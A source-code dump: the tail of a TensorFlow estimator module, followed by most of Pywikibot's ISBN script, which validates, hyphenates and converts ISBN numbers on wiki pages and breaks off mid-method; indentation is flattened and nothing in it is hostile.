from tensorflow.python.estimator.canned.dnn_linear_combined import DNNLinearCombinedRegressor
from tensorflow.python.estimator.canned.linear import LinearClassifier
from tensorflow.python.estimator.canned.linear import LinearRegressor
from tensorflow.python.estimator.canned.parsing_utils import classifier_parse_example_spec
from tensorflow.python.estimator.canned.parsing_utils import regressor_parse_example_spec
from tensorflow.python.estimator.estimator import Estimator
from tensorflow.python.estimator.export import export_lib as export
from tensorflow.python.estimator.exporter import Exporter
from tensorflow.python.estimator.exporter import FinalExporter
from tensorflow.python.estimator.exporter import LatestExporter
from tensorflow.python.estimator.inputs import inputs
from tensorflow.python.estimator.model_fn import EstimatorSpec
from tensorflow.python.estimator.model_fn import ModeKeys
from tensorflow.python.estimator.run_config import RunConfig
from tensorflow.python.estimator.training import EvalSpec
from tensorflow.python.estimator.training import train_and_evaluate
from tensorflow.python.estimator.training import TrainSpec
from tensorflow.python.util.all_util import remove_undocumented
# pylint: enable=unused-import,line-too-long,wildcard-import
_allowed_symbols = [
# Canned Estimators
'BaselineClassifier',
'BaselineRegressor',
'DNNClassifier',
'DNNRegressor',
'DNNLinearCombinedClassifier',
'DNNLinearCombinedRegressor',
'LinearClassifier',
'LinearRegressor',
# I/O
'classifier_parse_example_spec',
'regressor_parse_example_spec',
'inputs',
'export',
# Estimator
'Estimator',
'EstimatorSpec',
'ModeKeys',
'RunConfig',
# Training utilities
'train_and_evaluate',
'EvalSpec',
'TrainSpec',
'Exporter',
'LatestExporter',
'FinalExporter',
]
remove_undocumented(__name__, allowed_exception_list=_allowed_symbols)
|
apache-2.0
|
magul/pywikibot-core
|
scripts/isbn.py
|
1
|
42218
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This script reports and fixes invalid ISBN numbers.
Additionally, it can convert all ISBN-10 codes to the ISBN-13 format, and
correct the ISBN format by placing hyphens.
These command line parameters can be used to specify which pages to work on:
¶ms;
Furthermore, the following command line parameters are supported:
-to13 Converts all ISBN-10 codes to ISBN-13.
NOTE: This needn't be done, as MediaWiki still supports
(and will keep supporting) ISBN-10, and all libraries and
bookstores will most likely do so as well.
-format Corrects the hyphenation.
NOTE: This is in here for testing purposes only. Usually
it's not worth to create an edit for such a minor issue.
The recommended way of doing this is enabling
cosmetic_changes, so that these changes are made on-the-fly
to all pages that are modified.
-always Don't prompt you for each replacement.
-prop-isbn-10 Sets ISBN-10 property ID, so it's not tried to be found
automatically.
The usage is as follows: -prop-isbn-10:propid
-prop-isbn-13 Sets ISBN-13 property ID. The format and purpose is the
same as in -prop-isbn-10.
"""
#
# (C) Pywikibot team, 2009-2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
import re
from functools import partial
import pywikibot
from pywikibot import i18n, pagegenerators, textlib, Bot, WikidataBot
try:
import stdnum.isbn
except ImportError:
try:
import isbnlib
except ImportError:
pass
try:
import isbn_hyphenate
except ImportError:
pass
docuReplacements = {
'¶ms;': pagegenerators.parameterHelp,
}
# Maps each group number to the list of its publisher number ranges. Taken from:
# https://web.archive.org/web/20090823122028/http://www.isbn-international.org/converter/ranges.htm
ranges = {
'0': [ # English speaking area
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '949999'),
('9500000', '9999999'),
],
'1': [ # English speaking area
('00', '09'),
('100', '399'),
('4000', '5499'),
('55000', '86979'),
('869800', '998999'),
],
'2': [ # French speaking area
('00', '19'),
('200', '349'),
('35000', '39999'),
('400', '699'),
('7000', '8399'),
('84000', '89999'),
('900000', '949999'),
('9500000', '9999999'),
],
'3': [ # German speaking area
('00', '02'),
('030', '033'),
('0340', '0369'),
('03700', '03999'),
('04', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '949999'),
('9500000', '9999999'),
],
'4': [ # Japan
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '949999'),
('9500000', '9999999'),
],
'5': [ # Russian Federation
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '909999'),
('91000', '91999'),
('9200', '9299'),
('93000', '94999'),
('9500', '9799'),
('98000', '98999'),
('9900000', '9909999'),
('9910', '9999'),
],
'600': [ # Iran
('00', '09'),
('100', '499'),
('5000', '8999'),
('90000', '99999'),
],
'601': [ # Kazakhstan
('00', '19'),
('200', '699'),
('7000', '7999'),
('80000', '84999'),
('85', '99'),
],
'602': [ # Indonesia
('00', '19'),
('200', '799'),
('8000', '9499'),
('95000', '99999'),
],
'603': [ # Saudi Arabia
('00', '04'),
('500', '799'),
('8000', '8999'),
('90000', '99999'),
],
'604': [ # Vietnam
('0', '4'),
('50', '89'),
('900', '979'),
('9800', '9999'),
],
'605': [ # Turkey
('00', '09'),
('100', '399'),
('4000', '5999'),
('60000', '89999'),
],
'7': [ # China, People's Republic
('00', '09'),
('100', '499'),
('5000', '7999'),
('80000', '89999'),
('900000', '999999'),
],
'80': [ # Czech Republic; Slovakia
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '999999'),
],
'81': [ # India
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('900000', '999999'),
],
'82': [ # Norway
('00', '19'),
('200', '699'),
('7000', '8999'),
('90000', '98999'),
('990000', '999999'),
],
'83': [ # Poland
('00', '19'),
('200', '599'),
('60000', '69999'),
('7000', '8499'),
('85000', '89999'),
('900000', '999999'),
],
'84': [ # Spain
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('9000', '9199'),
('920000', '923999'),
('92400', '92999'),
('930000', '949999'),
('95000', '96999'),
('9700', '9999'),
],
'85': [ # Brazil
('00', '19'),
('200', '599'),
('60000', '69999'),
('7000', '8499'),
('85000', '89999'),
('900000', '979999'),
('98000', '99999'),
],
'86': [ # Serbia and Montenegro
('00', '29'),
('300', '599'),
('6000', '7999'),
('80000', '89999'),
('900000', '999999'),
],
'87': [ # Denmark
('00', '29'),
('400', '649'),
('7000', '7999'),
('85000', '94999'),
('970000', '999999'),
],
'88': [ # Italian speaking area
('00', '19'),
('200', '599'),
('6000', '8499'),
('85000', '89999'),
('900000', '949999'),
('95000', '99999'),
],
'89': [ # Korea
('00', '24'),
('250', '549'),
('5500', '8499'),
('85000', '94999'),
('950000', '999999'),
],
'90': [ # Netherlands, Belgium (Flemish)
('00', '19'),
('200', '499'),
('5000', '6999'),
('70000', '79999'),
('800000', '849999'),
('8500', '8999'),
('900000', '909999'),
('940000', '949999'),
],
'91': [ # Sweden
('0', '1'),
('20', '49'),
('500', '649'),
('7000', '7999'),
('85000', '94999'),
('970000', '999999'),
],
'92': [ # International Publishers (Unesco, EU), European Community Organizations
('0', '5'),
('60', '79'),
('800', '899'),
('9000', '9499'),
('95000', '98999'),
('990000', '999999'),
],
'93': [ # India - no ranges fixed yet
],
'950': [ # Argentina
('00', '49'),
('500', '899'),
('9000', '9899'),
('99000', '99999'),
],
'951': [ # Finland
('0', '1'),
('20', '54'),
('550', '889'),
('8900', '9499'),
('95000', '99999'),
],
'952': [ # Finland
('00', '19'),
('200', '499'),
('5000', '5999'),
('60', '65'),
('6600', '6699'),
('67000', '69999'),
('7000', '7999'),
('80', '94'),
('9500', '9899'),
('99000', '99999'),
],
'953': [ # Croatia
('0', '0'),
('10', '14'),
('150', '549'),
('55000', '59999'),
('6000', '9499'),
('95000', '99999'),
],
'954': [ # Bulgaria
('00', '29'),
('300', '799'),
('8000', '8999'),
('90000', '92999'),
('9300', '9999'),
],
'955': [ # Sri Lanka
('0', '0'),
('1000', '1999'),
('20', '54'),
('550', '799'),
('8000', '9499'),
('95000', '99999'),
],
'956': [ # Chile
('00', '19'),
('200', '699'),
('7000', '9999'),
],
'957': [ # Taiwan, China
('00', '02'),
('0300', '0499'),
('05', '19'),
('2000', '2099'),
('21', '27'),
('28000', '30999'),
('31', '43'),
('440', '819'),
('8200', '9699'),
('97000', '99999'),
],
'958': [ # Colombia
('00', '59'),
('600', '799'),
('8000', '9499'),
('95000', '99999'),
],
'959': [ # Cuba
('00', '19'),
('200', '699'),
('7000', '8499'),
],
'960': [ # Greece
('00', '19'),
('200', '659'),
('6600', '6899'),
('690', '699'),
('7000', '8499'),
('85000', '99999'),
],
'961': [ # Slovenia
('00', '19'),
('200', '599'),
('6000', '8999'),
('90000', '94999'),
],
'962': [ # Hong Kong
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '86999'),
('8700', '8999'),
('900', '999'),
],
'963': [ # Hungary
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('9000', '9999'),
],
'964': [ # Iran
('00', '14'),
('150', '249'),
('2500', '2999'),
('300', '549'),
('5500', '8999'),
('90000', '96999'),
('970', '989'),
('9900', '9999'),
],
'965': [ # Israel
('00', '19'),
('200', '599'),
('7000', '7999'),
('90000', '99999'),
],
'966': [ # Ukraine
('00', '19'),
('2000', '2999'),
('300', '699'),
('7000', '8999'),
('90000', '99999'),
],
'967': [ # Malaysia
('00', '29'),
('300', '499'),
('5000', '5999'),
('60', '89'),
('900', '989'),
('9900', '9989'),
('99900', '99999'),
],
'968': [ # Mexico
('01', '39'),
('400', '499'),
('5000', '7999'),
('800', '899'),
('9000', '9999'),
],
'969': [ # Pakistan
('0', '1'),
('20', '39'),
('400', '799'),
('8000', '9999'),
],
'970': [ # Mexico
('01', '59'),
('600', '899'),
('9000', '9099'),
('91000', '96999'),
('9700', '9999'),
],
'971': [ # Philippines?
('000', '019'),
('02', '02'),
('0300', '0599'),
('06', '09'),
('10', '49'),
('500', '849'),
('8500', '9099'),
('91000', '99999'),
],
'972': [ # Portugal
('0', '1'),
('20', '54'),
('550', '799'),
('8000', '9499'),
('95000', '99999'),
],
'973': [ # Romania
('0', '0'),
('100', '169'),
('1700', '1999'),
('20', '54'),
('550', '759'),
('7600', '8499'),
('85000', '88999'),
('8900', '9499'),
('95000', '99999'),
],
'974': [ # Thailand
('00', '19'),
('200', '699'),
('7000', '8499'),
('85000', '89999'),
('90000', '94999'),
('9500', '9999'),
],
'975': [ # Turkey
('00000', '00999'),
('01', '24'),
('250', '599'),
('6000', '9199'),
('92000', '98999'),
('990', '999'),
],
'976': [ # Caribbean Community
('0', '3'),
('40', '59'),
('600', '799'),
('8000', '9499'),
('95000', '99999'),
],
'977': [ # Egypt
('00', '19'),
('200', '499'),
('5000', '6999'),
('700', '999'),
],
'978': [ # Nigeria
('000', '199'),
('2000', '2999'),
('30000', '79999'),
('8000', '8999'),
('900', '999'),
],
'979': [ # Indonesia
('000', '099'),
('1000', '1499'),
('15000', '19999'),
('20', '29'),
('3000', '3999'),
('400', '799'),
('8000', '9499'),
('95000', '99999'),
],
'980': [ # Venezuela
('00', '19'),
('200', '599'),
('6000', '9999'),
],
'981': [ # Singapore
('00', '19'),
('200', '299'),
('3000', '9999'),
],
'982': [ # South Pacific
('00', '09'),
('100', '699'),
('70', '89'),
('9000', '9999'),
],
'983': [ # Malaysia
('00', '01'),
('020', '199'),
('2000', '3999'),
('40000', '44999'),
('45', '49'),
('50', '79'),
('800', '899'),
('9000', '9899'),
('99000', '99999'),
],
'984': [ # Bangladesh
('00', '39'),
('400', '799'),
('8000', '8999'),
('90000', '99999'),
],
'985': [ # Belarus
('00', '39'),
('400', '599'),
('6000', '8999'),
('90000', '99999'),
],
'986': [ # Taiwan, China
('00', '11'),
('120', '559'),
('5600', '7999'),
('80000', '99999'),
],
'987': [ # Argentina
('00', '09'),
('1000', '1999'),
('20000', '29999'),
('30', '49'),
('500', '899'),
('9000', '9499'),
('95000', '99999'),
],
'988': [ # Hongkong
('00', '16'),
('17000', '19999'),
('200', '799'),
('8000', '9699'),
('97000', '99999'),
],
'989': [ # Portugal
('0', '1'),
('20', '54'),
('550', '799'),
('8000', '9499'),
('95000', '99999'),
],
'9937': [ # Nepal
('0', '2'),
('30', '49'),
('500', '799'),
('8000', '9999'),
],
'9938': [ # Tunisia
('00', '79'),
('800', '949'),
('9500', '9999'),
],
'9939': [ # Armenia
('0', '4'),
('50', '79'),
('800', '899'),
('9000', '9999'),
],
'9940': [ # Montenegro
('0', '1'),
('20', '49'),
('500', '899'),
('9000', '9999'),
],
'9941': [ # Georgia
('0', '0'),
('10', '39'),
('400', '899'),
('9000', '9999'),
],
'9942': [ # Ecuador
('00', '89'),
('900', '994'),
('9950', '9999'),
],
'9943': [ # Uzbekistan
('00', '29'),
('300', '399'),
('4000', '9999'),
],
'9944': [ # Turkey
('0', '2'),
('300', '499'),
('5000', '5999'),
('60', '89'),
('900', '999'),
],
'9945': [ # Dominican Republic
('00', '00'),
('010', '079'),
('08', '39'),
('400', '569'),
('57', '57'),
('580', '849'),
('8500', '9999'),
],
'9946': [ # Korea, P.D.R.
('0', '1'),
('20', '39'),
('400', '899'),
('9000', '9999'),
],
'9947': [ # Algeria
('0', '1'),
('20', '79'),
('800', '999'),
],
'9948': [ # United Arab Emirates
('00', '39'),
('400', '849'),
('8500', '9999'),
],
'9949': [ # Estonia
('0', '0'),
('10', '39'),
('400', '899'),
('9000', '9999'),
],
'9950': [ # Palestine
('00', '29'),
('300', '840'),
('8500', '9999'),
],
'9951': [ # Kosova
('00', '39'),
('400', '849'),
('8500', '9999'),
],
'9952': [ # Azerbaijan
('0', '1'),
('20', '39'),
('400', '799'),
('8000', '9999'),
],
'9953': [ # Lebanon
('0', '0'),
('10', '39'),
('400', '599'),
('60', '89'),
('9000', '9999'),
],
'9954': [ # Morocco
('0', '1'),
('20', '39'),
('400', '799'),
('8000', '9999'),
],
'9955': [ # Lithuania
('00', '39'),
('400', '929'),
('9300', '9999'),
],
'9956': [ # Cameroon
('0', '0'),
('10', '39'),
('400', '899'),
('9000', '9999'),
],
'9957': [ # Jordan
('00', '39'),
('400', '699'),
('70', '84'),
('8500', '9999'),
],
'9958': [ # Bosnia and Herzegovina
('0', '0'),
('10', '49'),
('500', '899'),
('9000', '9999'),
],
'9959': [ # Libya
('0', '1'),
('20', '79'),
('800', '949'),
('9500', '9999'),
],
'9960': [ # Saudi Arabia
('00', '59'),
('600', '899'),
('9000', '9999'),
],
'9961': [ # Algeria
('0', '2'),
('30', '69'),
('700', '949'),
('9500', '9999'),
],
'9962': [ # Panama
('00', '54'),
('5500', '5599'),
('56', '59'),
('600', '849'),
('8500', '9999'),
],
'9963': [ # Cyprus
('0', '2'),
('30', '54'),
('550', '749'),
('7500', '9999'),
],
'9964': [ # Ghana
('0', '6'),
('70', '94'),
('950', '999'),
],
'9965': [ # Kazakhstan
('00', '39'),
('400', '899'),
('9000', '9999'),
],
'9966': [ # Kenya
('00', '69'),
('7000', '7499'),
('750', '959'),
('9600', '9999'),
],
'9967': [ # Kyrgyzstan
('00', '39'),
('400', '899'),
('9000', '9999'),
],
'9968': [ # Costa Rica
('00', '49'),
('500', '939'),
('9400', '9999'),
],
'9970': [ # Uganda
('00', '39'),
('400', '899'),
('9000', '9999'),
],
'9971': [ # Singapore
('0', '5'),
('60', '89'),
('900', '989'),
('9900', '9999'),
],
'9972': [ # Peru
('00', '09'),
('1', '1'),
('200', '249'),
('2500', '2999'),
('30', '59'),
('600', '899'),
('9000', '9999'),
],
'9973': [ # Tunisia
('0', '05'),
('060', '089'),
('0900', '0999'),
('10', '69'),
('700', '969'),
('9700', '9999'),
],
'9974': [ # Uruguay
('0', '2'),
('30', '54'),
('550', '749'),
('7500', '9499'),
('95', '99'),
],
'9975': [ # Moldova
('0', '0'),
('100', '399'),
('4000', '4499'),
('45', '89'),
('900', '949'),
('9500', '9999'),
],
'9976': [ # Tanzania
('0', '5'),
('60', '89'),
('900', '989'),
('9990', '9999'),
],
'9977': [ # Costa Rica
('00', '89'),
('900', '989'),
('9900', '9999'),
],
'9978': [ # Ecuador
('00', '29'),
('300', '399'),
('40', '94'),
('950', '989'),
('9900', '9999'),
],
'9979': [ # Iceland
('0', '4'),
('50', '64'),
('650', '659'),
('66', '75'),
('760', '899'),
('9000', '9999'),
],
'9980': [ # Papua New Guinea
('0', '3'),
('40', '89'),
('900', '989'),
('9900', '9999'),
],
'9981': [ # Morocco
('00', '09'),
('100', '159'),
('1600', '1999'),
('20', '79'),
('800', '949'),
('9500', '9999'),
],
'9982': [ # Zambia
('00', '79'),
('800', '989'),
('9900', '9999'),
],
'9983': [ # Gambia
('80', '94'),
('950', '989'),
('9900', '9999'),
],
'9984': [ # Latvia
('00', '49'),
('500', '899'),
('9000', '9999'),
],
'9985': [ # Estonia
('0', '4'),
('50', '79'),
('800', '899'),
('9000', '9999'),
],
'9986': [ # Lithuania
('00', '39'),
('400', '899'),
('9000', '9399'),
('940', '969'),
('97', '99'),
],
'9987': [ # Tanzania
('00', '39'),
('400', '879'),
('8800', '9999'),
],
'9988': [ # Ghana
('0', '2'),
('30', '54'),
('550', '749'),
('7500', '9999'),
],
'9989': [ # Macedonia
('0', '0'),
('100', '199'),
('2000', '2999'),
('30', '59'),
('600', '949'),
('9500', '9999'),
],
'99901': [ # Bahrain
('00', '49'),
('500', '799'),
('80', '99'),
],
'99902': [ # Gabon - no ranges fixed yet
],
'99903': [ # Mauritius
('0', '1'),
('20', '89'),
('900', '999'),
],
'99904': [ # Netherlands Antilles; Aruba, Neth. Ant
('0', '5'),
('60', '89'),
('900', '999'),
],
'99905': [ # Bolivia
('0', '3'),
('40', '79'),
('800', '999'),
],
'99906': [ # Kuwait
('0', '2'),
('30', '59'),
('600', '699'),
('70', '89'),
('9', '9'),
],
'99908': [ # Malawi
('0', '0'),
('10', '89'),
('900', '999'),
],
'99909': [ # Malta
('0', '3'),
('40', '94'),
('950', '999'),
],
'99910': [ # Sierra Leone
('0', '2'),
('30', '89'),
('900', '999'),
],
'99911': [ # Lesotho
('00', '59'),
('600', '999'),
],
'99912': [ # Botswana
('0', '3'),
('400', '599'),
('60', '89'),
('900', '999'),
],
'99913': [ # Andorra
('0', '2'),
('30', '35'),
('600', '604'),
],
'99914': [ # Suriname
('0', '4'),
('50', '89'),
('900', '949'),
],
'99915': [ # Maldives
('0', '4'),
('50', '79'),
('800', '999'),
],
'99916': [ # Namibia
('0', '2'),
('30', '69'),
('700', '999'),
],
'99917': [ # Brunei Darussalam
('0', '2'),
('30', '89'),
('900', '999'),
],
'99918': [ # Faroe Islands
('0', '3'),
('40', '79'),
('800', '999'),
],
'99919': [ # Benin
('0', '2'),
('40', '69'),
('900', '999'),
],
'99920': [ # Andorra
('0', '4'),
('50', '89'),
('900', '999'),
],
'99921': [ # Qatar
('0', '1'),
('20', '69'),
('700', '799'),
('8', '8'),
('90', '99'),
],
'99922': [ # Guatemala
('0', '3'),
('40', '69'),
('700', '999'),
],
'99923': [ # El Salvador
('0', '1'),
('20', '79'),
('800', '999'),
],
'99924': [ # Nicaragua
('0', '2'),
('30', '79'),
('800', '999'),
],
'99925': [ # Paraguay
('0', '3'),
('40', '79'),
('800', '999'),
],
'99926': [ # Honduras
('0', '0'),
('10', '59'),
('600', '999'),
],
'99927': [ # Albania
('0', '2'),
('30', '59'),
('600', '999'),
],
'99928': [ # Georgia
('0', '0'),
('10', '79'),
('800', '999'),
],
'99929': [ # Mongolia
('0', '4'),
('50', '79'),
('800', '999'),
],
'99930': [ # Armenia
('0', '4'),
('50', '79'),
('800', '999'),
],
'99931': [ # Seychelles
('0', '4'),
('50', '79'),
('800', '999'),
],
'99932': [ # Malta
('0', '0'),
('10', '59'),
('600', '699'),
('7', '7'),
('80', '99'),
],
'99933': [ # Nepal
('0', '2'),
('30', '59'),
('600', '999'),
],
'99934': [ # Dominican Republic
('0', '1'),
('20', '79'),
('800', '999'),
],
'99935': [ # Haiti
('0', '2'),
('7', '8'),
('30', '59'),
('600', '699'),
('90', '99'),
],
'99936': [ # Bhutan
('0', '0'),
('10', '59'),
('600', '999'),
],
'99937': [ # Macau
('0', '1'),
('20', '59'),
('600', '999'),
],
'99938': [ # Srpska
('0', '1'),
('20', '59'),
('600', '899'),
('90', '99'),
],
'99939': [ # Guatemala
('0', '5'),
('60', '89'),
('900', '999'),
],
'99940': [ # Georgia
('0', '0'),
('10', '69'),
('700', '999'),
],
'99941': [ # Armenia
('0', '2'),
('30', '79'),
('800', '999'),
],
'99942': [ # Sudan
('0', '4'),
('50', '79'),
('800', '999'),
],
'99943': [ # Alsbania
('0', '2'),
('30', '59'),
('600', '999'),
],
'99944': [ # Ethiopia
('0', '4'),
('50', '79'),
('800', '999'),
],
'99945': [ # Namibia
('0', '5'),
('60', '89'),
('900', '999'),
],
'99946': [ # Nepal
('0', '2'),
('30', '59'),
('600', '999'),
],
'99947': [ # Tajikistan
('0', '2'),
('30', '69'),
('700', '999'),
],
'99948': [ # Eritrea
('0', '4'),
('50', '79'),
('800', '999'),
],
'99949': [ # Mauritius
('0', '1'),
('20', '89'),
('900', '999'),
],
'99950': [ # Cambodia
('0', '4'),
('50', '79'),
('800', '999'),
],
'99951': [ # Congo - no ranges fixed yet
],
'99952': [ # Mali
('0', '4'),
('50', '79'),
('800', '999'),
],
'99953': [ # Paraguay
('0', '2'),
('30', '79'),
('800', '999'),
],
'99954': [ # Bolivia
('0', '2'),
('30', '69'),
('700', '999'),
],
'99955': [ # Srpska
('0', '1'),
('20', '59'),
('600', '899'),
('90', '99'),
],
'99956': [ # Albania
('00', '59'),
('600', '999'),
],
}
class InvalidIsbnException(pywikibot.Error):
"""Invalid ISBN."""
class ISBN(object):
"""Abstract superclass."""
def format(self):
"""Put hyphens into this ISBN number."""
result = ''
rest = ''
for digit in self.digits():
rest += str(digit)
# Determine the prefix (if any)
for prefix in self.possiblePrefixes():
if rest.startswith(prefix):
result += prefix + '-'
rest = rest[len(prefix):]
break
# Determine the group
for groupNumber in ranges.keys():
if rest.startswith(groupNumber):
result += groupNumber + '-'
rest = rest[len(groupNumber):]
publisherRanges = ranges[groupNumber]
break
else:
raise InvalidIsbnException('ISBN %s: group number unknown.'
% self.code)
# Determine the publisher
for (start, end) in publisherRanges:
length = len(start) # NOTE: start and end always have equal length
if rest[:length] >= start and rest[:length] <= end:
result += rest[:length] + '-'
rest = rest[length:]
break
else:
raise InvalidIsbnException('ISBN %s: publisher number unknown.'
% self.code)
# The rest is the item number and the 1-digit checksum.
result += rest[:-1] + '-' + rest[-1]
self.code = result
class ISBN13(ISBN):
"""ISBN 13."""
def __init__(self, code, checksumMissing=False):
"""Constructor."""
self.code = code
if checksumMissing:
self.code += str(self.calculateChecksum())
self.checkValidity()
def possiblePrefixes(self):
"""Return possible prefixes."""
return ['978', '979']
def digits(self):
"""Return a list of the digits in the ISBN code."""
result = []
for c in self.code:
if c.isdigit():
result.append(int(c))
elif c != '-':
raise InvalidIsbnException(
'The ISBN %s contains invalid characters.' % self.code)
return result
def checkValidity(self):
"""Check validity of ISBN."""
if len(self.digits()) != 13:
raise InvalidIsbnException('The ISBN %s is not 13 digits long.'
% self.code)
if self.calculateChecksum() != self.digits()[-1]:
raise InvalidIsbnException('The ISBN checksum of %s is incorrect.'
% self.code)
def calculateChecksum(self):
"""
Calculate checksum.
See https://en.wikipedia.org/wiki/ISBN#Check_digit_in_ISBN_13
"""
sum = 0
for i in range(0, 13 - 1, 2):
sum += self.digits()[i]
for i in range(1, 13 - 1, 2):
sum += 3 * self.digits()[i]
return (10 - (sum % 10)) % 10
class ISBN10(ISBN):
"""ISBN 10."""
def __init__(self, code):
"""Constructor."""
self.code = code
self.checkValidity()
def possiblePrefixes(self):
"""Return possible prefixes."""
return []
def digits(self):
"""Return a list of the digits and Xs in the ISBN code."""
result = []
for c in self.code:
if c.isdigit() or c in 'Xx':
result.append(c)
elif c != '-':
raise InvalidIsbnException(
'The ISBN %s contains invalid characters.' % self.code)
return result
def checkChecksum(self):
"""Raise an InvalidIsbnException if the ISBN checksum is incorrect."""
# See https://en.wikipedia.org/wiki/ISBN#Check_digit_in_ISBN_10
sum = 0
for i in range(0, 9):
sum += (i + 1) * int(self.digits()[i])
checksum = sum % 11
lastDigit = self.digits()[-1]
if not ((checksum == 10 and lastDigit in 'Xx') or
(lastDigit.isdigit() and checksum == int(lastDigit))):
raise InvalidIsbnException('The ISBN checksum of %s is incorrect.'
% self.code)
def checkValidity(self):
"""Check validity of ISBN."""
if len(self.digits()) != 10:
raise InvalidIsbnException('The ISBN %s is not 10 digits long.'
% self.code)
if 'X' in self.digits()[:-1] or 'x' in self.digits()[:-1]:
raise InvalidIsbnException(
'ISBN %s: X is only allowed at the end of the ISBN.'
% self.code)
self.checkChecksum()
def toISBN13(self):
"""
Create a 13-digit ISBN from this 10-digit ISBN.
Adds the GS1 prefix '978' and recalculates the checksum.
The hyphenation structure is taken from the format of the original
ISBN number.
@rtype: L{ISBN13}
"""
code = '978-' + self.code[:-1]
return ISBN13(code, checksumMissing=True)
def format(self):
"""Format ISBN number."""
# load overridden superclass method
ISBN.format(self)
# capitalize checksum
if self.code[-1] == 'x':
self.code = self.code[:-1] + 'X'
def getIsbn(code):
"""Return an ISBN object for the code."""
try:
i = ISBN13(code)
except InvalidIsbnException as e13:
try:
i = ISBN10(code)
except InvalidIsbnException as e10:
raise InvalidIsbnException(u'ISBN-13: %s / ISBN-10: %s'
% (e13, e10))
return i
def is_valid(isbn):
"""Check whether an ISBN 10 or 13 is valid."""
# isbnlib marks any ISBN10 with lowercase 'X' as invalid
isbn = isbn.upper()
try:
stdnum.isbn
except NameError:
pass
else:
try:
stdnum.isbn.validate(isbn)
except stdnum.isbn.InvalidFormat as e:
raise InvalidIsbnException(str(e))
except stdnum.isbn.InvalidChecksum as e:
raise InvalidIsbnException(str(e))
except stdnum.isbn.InvalidLength as e:
raise InvalidIsbnException(str(e))
return True
try:
isbnlib
except NameError:
pass
else:
if isbnlib.notisbn(isbn):
raise InvalidIsbnException('Invalid ISBN found')
return True
getIsbn(isbn)
return True
def _hyphenateIsbnNumber(match):
"""Helper function to deal with a single ISBN."""
isbn = match.group('code')
isbn = isbn.upper()
try:
is_valid(isbn)
except InvalidIsbnException:
return isbn
try:
stdnum.isbn
except NameError:
pass
else:
i = stdnum.isbn.format(isbn)
return i
try:
isbn_hyphenate
except NameError:
pass
else:
try:
i = isbn_hyphenate.hyphenate(isbn)
except (isbn_hyphenate.IsbnMalformedError,
isbn_hyphenate.IsbnUnableToHyphenateError):
return isbn
return i
i = getIsbn(isbn)
i.format()
return i.code
hyphenateIsbnNumbers = partial(textlib.reformat_ISBNs,
match_func=_hyphenateIsbnNumber)
def _isbn10toIsbn13(match):
"""Helper function to deal with a single ISBN."""
isbn = match.group('code')
isbn = isbn.upper()
try:
stdnum.isbn
except NameError:
pass
else:
try:
is_valid(isbn)
except InvalidIsbnException:
return isbn
i = stdnum.isbn.to_isbn13(isbn)
return i
try:
isbnlib
except NameError:
pass
else:
try:
is_valid(isbn)
except InvalidIsbnException:
return isbn
# remove hyphenation, otherwise isbnlib.to_isbn13() returns None
i = isbnlib.canonical(isbn)
if i == isbn:
i13 = isbnlib.to_isbn13(i)
return i13
# add removed hyphenation
i13 = isbnlib.to_isbn13(i)
i13h = hyphenateIsbnNumbers('ISBN ' + i13)
return i13h[5:]
try:
is_valid(isbn)
except InvalidIsbnException:
# don't change
return isbn
i1x = getIsbn(isbn)
if not isinstance(i1x, ISBN13):
i13 = i1x.toISBN13()
else:
i13 = i1x
return i13.code
def convertIsbn10toIsbn13(text):
"""Helper function to convert ISBN 10 to ISBN 13."""
isbnR = re.compile(r'(?<=ISBN )(?P<code>[\d\-]+[Xx]?)')
text = isbnR.sub(_isbn10toIsbn13, text)
return text
class IsbnBot(Bot):
"""ISBN bot."""
def __init__(self, generator, **kwargs):
"""Constructor."""
self.availableOptions.update({
'to13': False,
'format': False,
})
super(IsbnBot, self).__init__(**kwargs)
self.generator = generator
self.isbnR = re.compile(r'(?<=ISBN )(?P<code>[\d\-]+[Xx]?)')
self.comment = i18n.twtranslate(pywikibot.Site(), 'isbn-formatting')
def treat(self, page):
"""Treat a page."""
try:
old_text = page.get()
for match in self.isbnR.finditer(old_text):
isbn = match.group('code')
try:
is_valid(isbn)
except InvalidIsbnException as e:
pywikibot.output(e)
new_text = old_text
if self.getOption('to13'):
new_text = self.isbnR.sub(_isbn10toIsbn13, new_text)
if self.getOption('format'):
new_text = self.isbnR.sub(_hyphenateIsbnNumber, new_text)
try:
self.userPut(page, page.text, new_text, summary=self.comment)
except pywikibot.EditConflict:
pywikibot.output(u'Skipping %s because of edit conflict'
% page.title())
except pywikibot.SpamfilterError as e:
pywikibot.output(
u'Cannot change %s because of blacklist entry %s'
% (page.title(), e.url))
except pywikibot.LockedPage:
pywikibot.output(u'Skipping %s (locked page)'
% page.title())
except pywikibot.NoPage:
pywikibot.output(u"Page %s does not exist"
% page.title(asLink=True))
except pywikibot.IsRedirectPage:
pywikibot.output(u"Page %s is a redirect; skipping."
% page.title(asLink=True))
def run(self):
"""Run the bot."""
for page in self.generator:
self.treat(page)
class IsbnWikibaseBot(WikidataBot):
"""ISBN bot to be run on Wikibase sites."""
use_from_page = None
def __init__(self, generator, **kwargs):
"""Constructor."""
self.availableOptions.update({
'to13': False,
'format': False,
})
self.isbn_10_prop_id = kwargs.pop('prop-isbn-10', None)
self.isbn_13_prop_id = kwargs.pop('prop-isbn-13', None)
super(IsbnWikibaseBot, self).__init__(**kwargs)
self.generator = generator
if self.isbn_10_prop_id is None:
self.isbn_10_prop_id = self.get_property_by_name('ISBN-10')
if self.isbn_13_prop_id is None:
self.isbn_13_prop_id = self.get_property_by_name('ISBN-13')
self.comment = i18n.twtranslate(pywikibot.Site(), 'isbn-formatting')
def treat_page_and_item(self, page, item):
"""Treat a page."""
change_messages = []
item.get()
if self.isbn_10_prop_id in item.claims:
for claim in item.claims[self.isbn_10_prop_id]:
isbn = claim.getTarget()
try:
is_valid(isbn)
except InvalidIsbnException as e:
pywikibot.output(e)
continue
